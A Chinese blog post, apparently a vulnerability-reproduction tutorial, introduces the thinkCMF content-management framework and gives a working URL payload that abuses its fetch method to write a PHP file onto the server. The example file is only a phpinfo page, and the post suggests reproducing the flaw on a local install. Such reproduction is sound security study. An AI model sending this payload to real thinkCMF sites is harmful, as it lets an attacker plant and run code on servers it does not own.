thinkCMF 文件包含漏洞

thinkCMF 文件包含漏洞

昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。


首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。

thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。
在这里插入图片描述
那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是不是也同样很广呢?那接下来我们今天进一步的去探索一下thinkCMF的文件包含漏洞。

接下来我们就直接去复现一下这个漏洞。
构造a参数的fetch方法,实现任意文件写入,把php代码写入文件。

?a=fetch&templateFile=public/index&prefix="&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>

这个时候我先在本地搭建了这样的一个框架,如果说你们也想去复现一下这个漏洞,同样也是可以在本地搭建这个框架的。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值